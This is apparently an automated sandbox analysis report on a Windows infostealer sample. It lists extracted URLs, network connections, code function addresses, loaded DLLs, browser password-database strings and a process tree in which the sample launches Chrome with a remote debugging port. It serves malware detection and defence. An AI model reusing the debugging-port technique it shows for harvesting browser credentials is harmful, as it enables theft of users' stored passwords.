Source: chromecache_75.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_75.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_75.3.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_78.3.dr String found in binary or memory: https://plus.google.com
Source: chromecache_78.3.dr String found in binary or memory: https://plus.googleapis.com
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: zUKf62kgkm.exe, 00000000.00000003.1974204160.00000000055BE000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001034000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: zUKf62kgkm.exe, 00000000.00000003.1974204160.00000000055BE000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001034000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001034000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: chromecache_78.3.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: zUKf62kgkm.exe, 00000000.00000002.2097582422.000000000B6F2000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp, AKEGHIJJEHJDGCBFHCGI.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: zUKf62kgkm.exe, 00000000.00000003.1982026570.0000000000990000.00000004.00000020.00020000.00000000.sdmp, KFIDBAFH.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_78.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_78.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_75.3.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_75.3.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_75.3.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: zUKf62kgkm.exe, 00000000.00000003.2058389785.000000000B938000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: zUKf62kgkm.exe, 00000000.00000003.2058389785.000000000B938000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443

System Summary

barindex
Source: zUKf62kgkm.exe Static PE information: section name:
Source: zUKf62kgkm.exe Static PE information: section name: .idata
Source: zUKf62kgkm.exe Static PE information: section name:
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C47ED10
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4BB700
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C4BB8C0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C4BB910
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C45F280
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4535A0 0_2_6C4535A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C465440 0_2_6C465440
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C545C 0_2_6C4C545C
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4CAC00 0_2_6C4CAC00
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C495C10 0_2_6C495C10
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4A2C10 0_2_6C4A2C10
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C542B 0_2_6C4C542B
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4664C0 0_2_6C4664C0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47D4D0 0_2_6C47D4D0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45D4E0 0_2_6C45D4E0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C496CF0 0_2_6C496CF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C466C80 0_2_6C466C80
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B34A0 0_2_6C4B34A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BC4A0 0_2_6C4BC4A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46FD00 0_2_6C46FD00
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47ED10 0_2_6C47ED10
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C480512 0_2_6C480512
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C490DD0 0_2_6C490DD0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B85F0 0_2_6C4B85F0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4A2E4E 0_2_6C4A2E4E
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C474640 0_2_6C474640
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C479E50 0_2_6C479E50
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C493E50 0_2_6C493E50
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C6E63 0_2_6C4C6E63
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45C670 0_2_6C45C670
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4A5600 0_2_6C4A5600
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C497E10 0_2_6C497E10
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B9E30 0_2_6C4B9E30
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C76E3 0_2_6C4C76E3
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45BEF0 0_2_6C45BEF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46FEF0 0_2_6C46FEF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BE680 0_2_6C4BE680
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C475E90 0_2_6C475E90
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B4EA0 0_2_6C4B4EA0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C469F00 0_2_6C469F00
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C497710 0_2_6C497710
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45DFE0 0_2_6C45DFE0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C486FF0 0_2_6C486FF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4A77A0 0_2_6C4A77A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C478850 0_2_6C478850
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47D850 0_2_6C47D850
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C49F070 0_2_6C49F070
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C467810 0_2_6C467810
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C49B820 0_2_6C49B820
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4A4820 0_2_6C4A4820
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C50C7 0_2_6C4C50C7
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47C0E0 0_2_6C47C0E0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4958E0 0_2_6C4958E0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4860A0 0_2_6C4860A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C47A940 0_2_6C47A940
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46D960 0_2_6C46D960
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4AB970 0_2_6C4AB970
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4CB170 0_2_6C4CB170
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C495190 0_2_6C495190
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B2990 0_2_6C4B2990
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45C9A0 0_2_6C45C9A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C48D9B0 0_2_6C48D9B0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C499A60 0_2_6C499A60
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C498AC0 0_2_6C498AC0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C471AF0 0_2_6C471AF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C49E2F0 0_2_6C49E2F0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4CBA90 0_2_6C4CBA90
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4522A0 0_2_6C4522A0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C484AA0 0_2_6C484AA0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46CAB0 0_2_6C46CAB0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C2AB0 0_2_6C4C2AB0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C455340 0_2_6C455340
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46C370 0_2_6C46C370
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C49D320 0_2_6C49D320
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4C53C8 0_2_6C4C53C8
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C45F380 0_2_6C45F380
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: String function: 6C4994D0 appears 90 times
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: String function: 6C48CBE8 appears 134 times
Source: zUKf62kgkm.exe, 00000000.00000002.2101891401.000000006C6D5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs zUKf62kgkm.exe
Source: zUKf62kgkm.exe, 00000000.00000002.2101512630.000000006C4E2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs zUKf62kgkm.exe
Source: zUKf62kgkm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: zUKf62kgkm.exe Static PE information: Section: psmndnck ZLIB complexity 0.9947139071364587
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/36@7/7
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C4B7030
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OZM6EXIW.htm Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: zUKf62kgkm.exe, 00000000.00000003.1981566361.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, IJKJDAFHJDHIEBGCFIDB.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: zUKf62kgkm.exe, 00000000.00000002.2101181791.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2094593365.00000000056C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: zUKf62kgkm.exe Virustotal: Detection: 74%
Source: zUKf62kgkm.exe ReversingLabs: Detection: 71%
Source: zUKf62kgkm.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\zUKf62kgkm.exe "C:\Users\user\Desktop\zUKf62kgkm.exe"
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2528,i,2355188504449456598,833099339699259171,262144 /prefetch:8
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2528,i,2355188504449456598,833099339699259171,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Section loaded: ntmarta.dll Jump to behavior
